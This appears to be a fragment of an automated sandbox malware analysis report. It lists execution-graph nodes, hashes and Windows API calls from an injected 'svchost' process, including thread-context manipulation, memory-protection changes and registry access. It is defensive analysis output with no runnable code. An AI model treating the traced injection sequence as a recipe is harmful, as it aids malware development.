                                                        • Instruction Fuzzy Hash: 23E0E573612B40C6FB489B62D84C25D77A1FB88B15F4A8126CA0907321EF3A849D8A14
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000D.00000002.1817951404.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_13_2_7ffd9b800000_Deadsvchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: <L_^$L_^ $L_^"$L_^$
                                                        • API String ID: 0-2284102284

                                                        Execution Graph

                                                        Execution Coverage:0.9%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:1090
                                                        Total number of Limit Nodes:2
calls 7177->7179 7180 2a66130b392 7178->7180 7179->7176 7180->7181 7183 2a66130b980 _set_errno_from_matherr 13 API calls 7180->7183 7185 2a66130b416 7181->7185 7186 2a66130ad4b 7181->7186 7184 2a66130b3a5 7183->7184 7187 2a66130b3c3 7184->7187 7188 2a66130b3b3 7184->7188 7233 2a66130acb4 7185->7233 7225 2a66130e604 7186->7225 7192 2a66130d728 _set_errno_from_matherr 6 API calls 7187->7192 7190 2a66130d728 _set_errno_from_matherr 6 API calls 7188->7190 7202 2a66130b3ba 7190->7202 7193 2a66130b3cb 7192->7193 7194 2a66130b3cf 7193->7194 7195 2a66130b3e1 7193->7195 7197 2a66130d728 _set_errno_from_matherr 6 API calls 7194->7197 7198 2a66130b0b4 _set_errno_from_matherr 13 API calls 7195->7198 7197->7202 7203 2a66130b3e9 7198->7203 7200 2a66130b9f8 __free_lconv_num 13 API calls 7200->7181 7202->7200 7206 2a66130b9f8 __free_lconv_num 13 API calls 7203->7206 7206->7181 7226 2a66130e619 7225->7226 7228 2a66130ad6e 7225->7228 7226->7228 7285 2a66130eaac 7226->7285 7229 2a66130e638 7228->7229 7230 2a66130e64d 7229->7230 7231 2a66130e660 7229->7231 7230->7231 7298 2a66130cdb8 7230->7298 7231->7121 7242 2a66130dd28 7233->7242 7276 2a66130dce0 7242->7276 7281 2a66130aebc EnterCriticalSection 7276->7281 7286 2a66130b348 33 API calls 7285->7286 7287 2a66130eabb 7286->7287 7288 2a66130eb06 7287->7288 7297 2a66130aebc EnterCriticalSection 7287->7297 7288->7228 7299 2a66130b348 33 API calls 7298->7299 7300 2a66130cdc1 7299->7300 7302 2a66130af77 7301->7302 7306 2a66130af3b _set_errno_from_matherr 7301->7306 7304 2a66130b960 _set_errno_from_matherr 13 API calls 7302->7304 7303 2a66130af5e HeapAlloc 7305 2a66130af75 7303->7305 7303->7306 7304->7305 7305->7144 7306->7302 7306->7303 7307 2a661309e44 _set_errno_from_matherr 2 API calls 7306->7307 7307->7306 7309 2a66130d14c MultiByteToWideChar 7308->7309 7313 2a66130d1c3 WideCharToMultiByte 7311->7313 7501 2a6613083d4 7502 2a661309538 __std_exception_copy 30 API calls 7501->7502 7503 2a6613083fd 7502->7503 7670 2a661305654 7671 
2a66130565a 7670->7671 7682 2a661307c90 7671->7682 7674 2a6613056be 7676 2a661305757 _invalid_parameter_noinfo 7676->7674 7679 2a6613058dd 7676->7679 7695 2a661307860 7676->7695 7678 2a6613059db 7679->7678 7680 2a661305a57 VirtualProtect 7679->7680 7680->7674 7681 2a661305a83 GetLastError 7680->7681 7681->7674 7683 2a661307c9b 7682->7683 7684 2a66130569d 7683->7684 7685 2a661309e44 _set_errno_from_matherr 2 API calls 7683->7685 7686 2a661307cba 7683->7686 7684->7674 7691 2a6613040e0 7684->7691 7685->7683 7687 2a661307cc5 7686->7687 7701 2a6613084bc 7686->7701 7705 2a6613084dc 7687->7705 7692 2a6613040fd 7691->7692 7694 2a66130416c _invalid_parameter_noinfo 7692->7694 7714 2a661304350 7692->7714 7694->7676 7696 2a6613078a7 7695->7696 7739 2a661307630 7696->7739 7699 2a661307d60 _handle_error 8 API calls 7700 2a6613078d1 7699->7700 7700->7676 7702 2a6613084ca std::bad_alloc::bad_alloc 7701->7702 7709 2a6613095f0 7702->7709 7704 2a6613084db 7706 2a6613084ea std::bad_alloc::bad_alloc 7705->7706 7707 2a6613095f0 Concurrency::cancel_current_task 2 API calls 7706->7707 7708 2a661307ccb 7707->7708 7710 2a66130962c RtlPcToFileHeader 7709->7710 7711 2a66130960f 7709->7711 7712 2a661309653 RaiseException 7710->7712 7713 2a661309644 7710->7713 7711->7710 7712->7704 7713->7712 7715 2a661304397 7714->7715 7716 2a661304374 7714->7716 7717 2a6613043cd 7715->7717 7734 2a661303f30 7715->7734 7716->7715 7728 2a661303e00 7716->7728 7720 2a6613043fd 7717->7720 7721 2a661303f30 2 API calls 7717->7721 7722 2a661303e00 3 API calls 7720->7722 7726 2a661304433 7720->7726 7721->7720 7722->7726 7723 2a661303e00 3 API calls 7724 2a66130444f 7723->7724 7725 2a66130446b 7724->7725 7727 2a661303f30 2 API calls 7724->7727 7725->7694 7726->7723 7726->7724 7727->7725 7731 2a661303e21 _invalid_parameter_noinfo 7728->7731 7729 2a661303e90 7729->7715 7730 2a661303e76 VirtualQuery 7730->7729 7730->7731 7731->7729 7731->7730 7732 2a661303eaa VirtualAlloc 7731->7732 7732->7729 7733 2a661303edb 
GetLastError 7732->7733 7733->7729 7733->7731 7735 2a661303f48 _invalid_parameter_noinfo 7734->7735 7736 2a661303f9d VirtualQuery 7735->7736 7737 2a661303fb7 7735->7737 7738 2a661304002 GetLastError 7735->7738 7736->7735 7736->7737 7737->7717 7738->7735 7738->7737 7740 2a66130764b 7739->7740 7741 2a661307661 SetLastError 7740->7741 7742 2a66130766f 7740->7742 7741->7742 7742->7699 7314 2a66130d354 7315 2a66130d376 7314->7315 7316 2a66130d393 7314->7316 7315->7316 7317 2a66130d384 7315->7317 7318 2a66130d39d 7316->7318 7323 2a66130fa6c 7316->7323 7319 2a66130b960 _set_errno_from_matherr 13 API calls 7317->7319 7330 2a66130faa8 7318->7330 7322 2a66130d389 _invalid_parameter_noinfo 7319->7322 7324 2a66130fa8e HeapSize 7323->7324 7325 2a66130fa75 7323->7325 7326 2a66130b960 _set_errno_from_matherr 13 API calls 7325->7326 7327 2a66130fa7a 7326->7327 7328 2a66130b840 _invalid_parameter_noinfo 30 API calls 7327->7328 7329 2a66130fa85 7328->7329 7329->7318 7331 2a66130fac7 7330->7331 7332 2a66130fabd 7330->7332 7334 2a66130facc 7331->7334 7341 2a66130fad3 _set_errno_from_matherr 7331->7341 7333 2a66130af2c 14 API calls 7332->7333 7339 2a66130fac5 7333->7339 7335 2a66130b9f8 __free_lconv_num 13 API calls 7334->7335 7335->7339 7336 2a66130fb06 HeapReAlloc 7336->7339 7336->7341 7337 2a66130fad9 7338 2a66130b960 _set_errno_from_matherr 13 API calls 7337->7338 7338->7339 7339->7322 7340 2a661309e44 _set_errno_from_matherr 2 API calls 7340->7341 7341->7336 7341->7337 7341->7340 7743 2a66130fa54 7746 2a66130cd58 7743->7746 7747 2a66130cd65 7746->7747 7751 2a66130cdaa 7746->7751 7752 2a66130b41c 7747->7752 7753 2a66130b432 7752->7753 7754 2a66130b42d 7752->7754 7756 2a66130d728 _set_errno_from_matherr 6 API calls 7753->7756 7758 2a66130b43a 7753->7758 7755 2a66130d6e0 _set_errno_from_matherr 6 API calls 7754->7755 7755->7753 7757 2a66130b451 7756->7757 7757->7758 7759 2a66130b980 _set_errno_from_matherr 13 API calls 7757->7759 7760 2a66130acb4 33 API calls 7758->7760 7765 
2a66130b4b4 7758->7765 7761 2a66130b464 7759->7761 7762 2a66130b4c2 7760->7762 7763 2a66130b482 7761->7763 7764 2a66130b472 7761->7764 7766 2a66130d728 _set_errno_from_matherr 6 API calls 7763->7766 7767 2a66130d728 _set_errno_from_matherr 6 API calls 7764->7767 7777 2a66130cae0 7765->7777 7768 2a66130b48a 7766->7768 7769 2a66130b479 7767->7769 7770 2a66130b48e 7768->7770 7771 2a66130b4a0 7768->7771 7774 2a66130b9f8 __free_lconv_num 13 API calls 7769->7774 7772 2a66130d728 _set_errno_from_matherr 6 API calls 7770->7772 7773 2a66130b0b4 _set_errno_from_matherr 13 API calls 7771->7773 7772->7769 7775 2a66130b4a8 7773->7775 7774->7758 7776 2a66130b9f8 __free_lconv_num 13 API calls 7775->7776 7776->7758 7795 2a66130cca0 7777->7795 7779 2a66130cb09 7810 2a66130c7ec 7779->7810 7782 2a66130cb23 7782->7751 7783 2a66130af2c 14 API calls 7785 2a66130cb34 7783->7785 7784 2a66130cbcf 7786 2a66130b9f8 __free_lconv_num 13 API calls 7784->7786 7785->7784 7817 2a66130cdd4 7785->7817 7786->7782 7789 2a66130cbca 7790 2a66130b960 _set_errno_from_matherr 13 API calls 7789->7790 7790->7784 7791 2a66130cc2c 7791->7784 7828 2a66130c630 7791->7828 7792 2a66130cbef 7792->7791 7793 2a66130b9f8 __free_lconv_num 13 API calls 7792->7793 7793->7791 7796 2a66130ccc3 7795->7796 7797 2a66130cccd 7796->7797 7843 2a66130aebc EnterCriticalSection 7796->7843 7800 2a66130cd3f 7797->7800 7802 2a66130acb4 33 API calls 7797->7802 7800->7779 7803 2a66130cd57 7802->7803 7806 2a66130b41c 33 API calls 7803->7806 7809 2a66130cdaa 7803->7809 7807 2a66130cd94 7806->7807 7808 2a66130cae0 43 API calls 7807->7808 7808->7809 7809->7779 7811 2a66130ad0c 33 API calls 7810->7811 7812 2a66130c800 7811->7812 7813 2a66130c80c GetOEMCP 7812->7813 7814 2a66130c81e 7812->7814 7816 2a66130c833 7813->7816 7815 2a66130c823 GetACP 7814->7815 7814->7816 7815->7816 7816->7782 7816->7783 7818 2a66130c7ec 35 API calls 7817->7818 7819 2a66130cdff 7818->7819 7821 2a66130ce3c IsValidCodePage 7819->7821 7825 2a66130ce7f 
_invalid_parameter_noinfo 7819->7825 7820 2a661307d60 _handle_error 8 API calls 7822 2a66130cbc3 7820->7822 7823 2a66130ce4d 7821->7823 7821->7825 7822->7789 7822->7792 7824 2a66130ce84 GetCPInfo 7823->7824 7827 2a66130ce56 _invalid_parameter_noinfo 7823->7827 7824->7825 7824->7827 7825->7820 7844 2a66130c8fc 7827->7844 7912 2a66130aebc EnterCriticalSection 7828->7912 7845 2a66130c939 GetCPInfo 7844->7845 7854 2a66130ca2f 7844->7854 7850 2a66130c94c 7845->7850 7845->7854 7846 2a661307d60 _handle_error 8 API calls 7848 2a66130cac8 7846->7848 7848->7825 7855 2a66130f514 7850->7855 7853 2a66130f9bc 37 API calls 7853->7854 7854->7846 7856 2a66130ad0c 33 API calls 7855->7856 7857 2a66130f556 7856->7857 7858 2a66130d144 MultiByteToWideChar 7857->7858 7860 2a66130f58c 7858->7860 7859 2a66130f593 7861 2a661307d60 _handle_error 8 API calls 7859->7861 7860->7859 7862 2a66130af2c 14 API calls 7860->7862 7864 2a66130f5b8 _invalid_parameter_noinfo 7860->7864 7863 2a66130c9c3 7861->7863 7862->7864 7870 2a66130f9bc 7863->7870 7865 2a66130d144 MultiByteToWideChar 7864->7865 7866 2a66130f650 7864->7866 7867 2a66130f632 7865->7867 7866->7859 7868 2a66130b9f8 __free_lconv_num 13 API calls 7866->7868 7867->7866 7869 2a66130f636 GetStringTypeW 7867->7869 7868->7859 7869->7866 7871 2a66130ad0c 33 API calls 7870->7871 7872 2a66130f9e1 7871->7872 7875 2a66130f6a4 7872->7875 7876 2a66130f6e6 7875->7876 7877 2a66130d144 MultiByteToWideChar 7876->7877 7880 2a66130f730 7877->7880 7878 2a66130f96f 7879 2a661307d60 _handle_error 8 API calls 7878->7879 7881 2a66130c9f6 7879->7881 7880->7878 7882 2a66130af2c 14 API calls 7880->7882 7885 2a66130f763 7880->7885 7881->7853 7882->7885 7883 2a66130d144 MultiByteToWideChar 7884 2a66130f7d5 7883->7884 7886 2a66130f867 7884->7886 7903 2a66130d7e0 7884->7903 7885->7883 7885->7886 7886->7878 7888 2a66130b9f8 __free_lconv_num 13 API calls 7886->7888 7888->7878 7890 2a66130f876 7892 2a66130af2c 14 API calls 7890->7892 7895 2a66130f890 7890->7895 7891 
2a66130f824 7891->7886 7893 2a66130d7e0 6 API calls 7891->7893 7892->7895 7893->7886 7894 2a66130d7e0 6 API calls 7897 2a66130f911 7894->7897 7895->7886 7895->7894 7896 2a66130f946 7896->7886 7898 2a66130b9f8 __free_lconv_num 13 API calls 7896->7898 7897->7896 7899 2a66130d1a0 WideCharToMultiByte 7897->7899 7898->7886 7900 2a66130f940 7899->7900 7900->7896 7901 2a66130f9a6 7900->7901 7901->7886 7902 2a66130b9f8 __free_lconv_num 13 API calls 7901->7902 7902->7886 7904 2a66130d3ec try_get_function 5 API calls 7903->7904 7905 2a66130d81e 7904->7905 7906 2a66130d823 7905->7906 7909 2a66130d8bc 7905->7909 7906->7886 7906->7890 7906->7891 7908 2a66130d87f LCMapStringW 7908->7906 7910 2a66130d3ec try_get_function 5 API calls 7909->7910 7911 2a66130d8ea 7910->7911 7911->7908 7342 2a66130a13b 7345 2a66130ac20 7342->7345 7346 2a66130b348 33 API calls 7345->7346 7347 2a66130ac29 7346->7347 7348 2a66130acb4 33 API calls 7347->7348 7349 2a66130ac3f 7348->7349 7350 2a661307f3c 7351 2a661307f60 __scrt_release_startup_lock 7350->7351 7352 2a661309eb9 7351->7352 7353 2a66130b4c4 _set_errno_from_matherr 13 API calls 7351->7353 7354 2a661309ee2 7353->7354 7355 2a66130d940 7356 2a66130d979 7355->7356 7357 2a66130d94a 7355->7357 7357->7356 7358 2a66130d95f FreeLibrary 7357->7358 7358->7357 7504 2a661312bc2 7505 2a661312bdb 7504->7505 7506 2a661312bd1 7504->7506 7508 2a66130af10 LeaveCriticalSection 7506->7508 8032 2a6613060c3 8033 2a6613060d0 8032->8033 8034 2a6613060dc GetThreadContext 8033->8034 8035 2a66130623a 8033->8035 8034->8035 8036 2a661306102 8034->8036 8037 2a66130631e 8035->8037 8038 2a661306261 VirtualProtect FlushInstructionCache 8035->8038 8036->8035 8043 2a661306129 8036->8043 8039 2a66130633e 8037->8039 8042 2a661304800 VirtualFree 8037->8042 8038->8035 8040 2a661305210 3 API calls 8039->8040 8047 2a661306343 8040->8047 8041 2a6613061ad 8042->8039 8043->8041 8044 2a661306186 SetThreadContext 8043->8044 8044->8041 8045 2a661306397 8048 2a661307d60 _handle_error 8 API 
calls 8045->8048 8046 2a661306357 ResumeThread 8046->8047 8047->8045 8047->8046 8049 2a6613063df 8048->8049 7359 2a66130ab44 7360 2a66130b9f8 __free_lconv_num 13 API calls 7359->7360 7361 2a66130ab54 7360->7361 7362 2a66130b9f8 __free_lconv_num 13 API calls 7361->7362 7363 2a66130ab68 7362->7363 7364 2a66130b9f8 __free_lconv_num 13 API calls 7363->7364 7365 2a66130ab7c 7364->7365 7366 2a66130b9f8 __free_lconv_num 13 API calls 7365->7366 7367 2a66130ab90 7366->7367 7368 2a661302344 GetProcessIdOfThread GetCurrentProcessId 7369 2a6613023ea 7368->7369 7370 2a66130236f CreateFileW 7368->7370 7370->7369 7371 2a6613023a3 WriteFile ReadFile CloseHandle 7370->7371 7371->7369 7509 2a66130dba8 7520 2a66130aebc EnterCriticalSection 7509->7520 8050 2a6613116ab 8051 2a6613116eb 8050->8051 8052 2a661311950 8050->8052 8051->8052 8054 2a661311932 8051->8054 8055 2a66131171f 8051->8055 8053 2a661311946 8052->8053 8057 2a661312230 _log10_special 22 API calls 8052->8057 8058 2a661312230 8054->8058 8057->8053 8061 2a661312250 8058->8061 8062 2a66131226a 8061->8062 8063 2a66131224b 8062->8063 8065 2a661312094 8062->8065 8063->8053 8066 2a6613120d4 _handle_error 8065->8066 8068 2a661312140 _handle_error 8066->8068 8076 2a661312350 8066->8076 8069 2a66131217d 8068->8069 8070 2a66131214d 8068->8070 8083 2a661312688 8069->8083 8079 2a661311f70 8070->8079 8073 2a66131217b _handle_error 8074 2a661307d60 _handle_error 8 API calls 8073->8074 8075 2a6613121a5 8074->8075 8075->8063 8089 2a661312378 8076->8089 8080 2a661311fb4 _handle_error 8079->8080 8081 2a661311fc9 8080->8081 8082 2a661312688 _set_errno_from_matherr 13 API calls 8080->8082 8081->8073 8082->8081 8084 2a6613126a6 8083->8084 8085 2a661312691 8083->8085 8087 2a66130b960 _set_errno_from_matherr 13 API calls 8084->8087 8086 2a66131269e 8085->8086 8088 2a66130b960 _set_errno_from_matherr 13 API calls 8085->8088 8086->8073 8087->8086 8088->8086 8090 2a6613123b7 _raise_exc _clrfp 8089->8090 8091 2a6613125cc RaiseException 8090->8091 
8092 2a661312372 8091->8092 8092->8068 8093 2a66130aaac 8096 2a66130a878 8093->8096 8103 2a66130a840 8096->8103 8101 2a66130a7fc 13 API calls 8102 2a66130a8a0 8101->8102 8104 2a66130a850 8103->8104 8105 2a66130a855 8103->8105 8106 2a66130a7fc 13 API calls 8104->8106 8107 2a66130a85c 8105->8107 8106->8105 8108 2a66130a86c 8107->8108 8109 2a66130a871 8107->8109 8110 2a66130a7fc 13 API calls 8108->8110 8109->8101 8110->8109 8111 2a661305cac 8112 2a661305cb3 8111->8112 8113 2a661305ce0 VirtualProtect 8112->8113 8115 2a661305bf0 8112->8115 8114 2a661305d09 GetLastError 8113->8114 8113->8115 8114->8115 8116 2a661312aaf 8117 2a661312ac7 8116->8117 8123 2a661312b32 8116->8123 8117->8123 8124 2a66130977c 8117->8124 8120 2a66130977c 42 API calls 8121 2a661312b29 8120->8121 8122 2a66130ac20 33 API calls 8121->8122 8122->8123 8125 2a661309798 9 API calls 8124->8125 8126 2a661309785 8125->8126 8127 2a66130978a 8126->8127 8128 2a66130acb4 33 API calls 8126->8128 8127->8120 8129 2a661309794 8128->8129 7521 2a6613029b0 7523 2a6613029f5 7521->7523 7522 2a661302a54 7523->7522 7524 2a661303c70 StrCmpNIW 7523->7524 7524->7523 8130 2a661307eb0 8131 2a661307eb9 __scrt_release_startup_lock 8130->8131 8133 2a661307ebd 8131->8133 8134 2a66130a500 8131->8134 8135 2a66130a520 8134->8135 8136 2a66130a537 8134->8136 8137 2a66130a528 8135->8137 8138 2a66130a53e 8135->8138 8136->8133 8140 2a66130b960 _set_errno_from_matherr 13 API calls 8137->8140 8139 2a66130cd58 43 API calls 8138->8139 8142 2a66130a543 8139->8142 8141 2a66130a52d 8140->8141 8143 2a66130b840 _invalid_parameter_noinfo 30 API calls 8141->8143 8165 2a66130c510 GetModuleFileNameW 8142->8165 8143->8136 8148 2a66130a4a0 13 API calls 8149 2a66130a5ad 8148->8149 8150 2a66130a5cd 8149->8150 8151 2a66130a5b5 8149->8151 8153 2a66130a2e0 33 API calls 8150->8153 8152 2a66130b960 _set_errno_from_matherr 13 API calls 8151->8152 8154 2a66130a5ba 8152->8154 8158 2a66130a5e9 8153->8158 8155 2a66130b9f8 __free_lconv_num 13 API calls 8154->8155 
8155->8136 8156 2a66130a5ef 8157 2a66130b9f8 __free_lconv_num 13 API calls 8156->8157 8157->8136 8158->8156 8159 2a66130a61b 8158->8159 8160 2a66130a634 8158->8160 8161 2a66130b9f8 __free_lconv_num 13 API calls 8159->8161 8162 2a66130b9f8 __free_lconv_num 13 API calls 8160->8162 8163 2a66130a624 8161->8163 8162->8156 8164 2a66130b9f8 __free_lconv_num 13 API calls 8163->8164 8164->8136 8166 2a66130c556 GetLastError 8165->8166 8167 2a66130c56a 8165->8167 8183 2a66130b8f0 8166->8183 8169 2a66130ad0c 33 API calls 8167->8169 8170 2a66130c598 8169->8170 8171 2a66130c5a9 8170->8171 8173 2a66130d614 5 API calls 8170->8173 8188 2a66130c3fc 8171->8188 8172 2a661307d60 _handle_error 8 API calls 8175 2a66130a55a 8172->8175 8173->8171 8177 2a66130a2e0 8175->8177 8176 2a66130c563 8176->8172 8179 2a66130a31e 8177->8179 8181 2a66130a384 8179->8181 8202 2a66130d108 8179->8202 8180 2a66130a473 8180->8148 8181->8180 8182 2a66130d108 33 API calls 8181->8182 8182->8181 8184 2a66130b4c4 _set_errno_from_matherr 13 API calls 8183->8184 8185 2a66130b901 8184->8185 8186 2a66130b4c4 _set_errno_from_matherr 13 API calls 8185->8186 8187 2a66130b91a 8186->8187 8187->8176 8189 2a66130c439 8188->8189 8190 2a66130c420 8188->8190 8191 2a66130d1a0 WideCharToMultiByte 8189->8191 8192 2a66130c43e 8189->8192 8190->8176 8193 2a66130c491 8191->8193 8192->8190 8194 2a66130b960 _set_errno_from_matherr 13 API calls 8192->8194 8193->8192 8195 2a66130c498 GetLastError 8193->8195 8197 2a66130c4c1 8193->8197 8194->8190 8196 2a66130b8f0 13 API calls 8195->8196 8199 2a66130c4a5 8196->8199 8198 2a66130d1a0 WideCharToMultiByte 8197->8198 8200 2a66130c4e8 8198->8200 8201 2a66130b960 _set_errno_from_matherr 13 API calls 8199->8201 8200->8190 8200->8195 8201->8190 8203 2a66130d090 8202->8203 8204 2a66130ad0c 33 API calls 8203->8204 8205 2a66130d0b4 8204->8205 8205->8179 8206 2a6613030b0 8208 2a6613030e0 8206->8208 8207 2a661303199 8208->8207 8209 2a6613030fd PdhGetCounterInfoW 8208->8209 8209->8207 8210 2a66130311b 
GetProcessHeap HeapAlloc PdhGetCounterInfoW 8209->8210 8211 2a66130314d StrCmpW 8210->8211 8212 2a661303185 GetProcessHeap HeapFree 8210->8212 8211->8212 8214 2a661303162 8211->8214 8212->8207 8213 2a661303558 12 API calls 8213->8214 8214->8212 8214->8213

                                                        Control-flow Graph

                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32 ref: 000002A661303631
                                                        • PathFindFileNameW.SHLWAPI ref: 000002A661303640
                                                          • Part of subcall function 000002A661303C70: StrCmpNIW.KERNELBASE(?,?,?,000002A66130255A), ref: 000002A661303C88
                                                          • Part of subcall function 000002A661303BB8: GetModuleHandleW.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303BC6
                                                          • Part of subcall function 000002A661303BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303BF4
                                                          • Part of subcall function 000002A661303BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303C16
                                                          • Part of subcall function 000002A661303BB8: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303C34
                                                          • Part of subcall function 000002A661303BB8: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A661303657), ref: 000002A661303C55
                                                        • CreateThread.KERNELBASE ref: 000002A661303687
                                                          • Part of subcall function 000002A661301D3C: GetCurrentThread.KERNEL32 ref: 000002A661301D47
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction ID: d46ac804a58af02ee5119201535612e0b919cc52077020a87d3245cf7316e704
                                                        • Opcode Fuzzy Hash: 78a450f75234da4d748a8cc1e146820bb39c36540aa3f900bd2c9a3848025828
                                                        • Instruction Fuzzy Hash: 39115230F10A044BFB64E721A94EB5A66ECB756F56F9845269807A36D0DF7DC10C8A83

                                                        Control-flow Graph

                                                        control_flow_graph 18 2a661303c70-2a661303c7b 19 2a661303c7d-2a661303c90 StrCmpNIW 18->19 20 2a661303c95-2a661303c9c 18->20 19->20 21 2a661303c92 19->21 21->20
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Dead
                                                        • API String ID: 0-1293411866
                                                        • Opcode ID: 6fb73889c1581f2e1b76d9bdaa8d74932699fe8d643b78f0f876c7c0ad846881
                                                        • Instruction ID: f6d5a0dbe65f5e9c663829fcc500f55916c72a583d24b7860ffd4bca3bdb7618
                                                        • Opcode Fuzzy Hash: 6fb73889c1581f2e1b76d9bdaa8d74932699fe8d643b78f0f876c7c0ad846881
                                                        • Instruction Fuzzy Hash: 12D0A720B11689CBFF15DFA288CD6603798EB06F15F8C9025C90357214DF1CC94DC715
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction ID: 5fc31caba2d6a33548e2378d5c9ab3eb92b81a219a44c6a4ac0fc3518521d9b1
                                                        • Opcode Fuzzy Hash: 24c55482e3ee7e9e3b87009127322f5f012175c8db73c85287ddc3c1b6fbd12d
                                                        • Instruction Fuzzy Hash: 0591EFB2F0129087EB64CF25D04CB69B3A9FB55F94F598125DE4A47788DF38D88AC701

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000002A661301628: GetProcessHeap.KERNEL32 ref: 000002A661301633
                                                          • Part of subcall function 000002A661301628: HeapAlloc.KERNEL32 ref: 000002A661301642
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016B2
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016DF
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613016F9
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301719
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301734
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301754
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130176F
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130178F
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017AA
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017CA
                                                        • SleepEx.KERNELBASE ref: 000002A661301AE3
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613017E5
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301805
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301820
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A661301840
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A66130185B
                                                          • Part of subcall function 000002A661301628: RegOpenKeyExW.ADVAPI32 ref: 000002A66130187B
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A661301896
                                                          • Part of subcall function 000002A661301628: RegCloseKey.ADVAPI32 ref: 000002A6613018A0
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
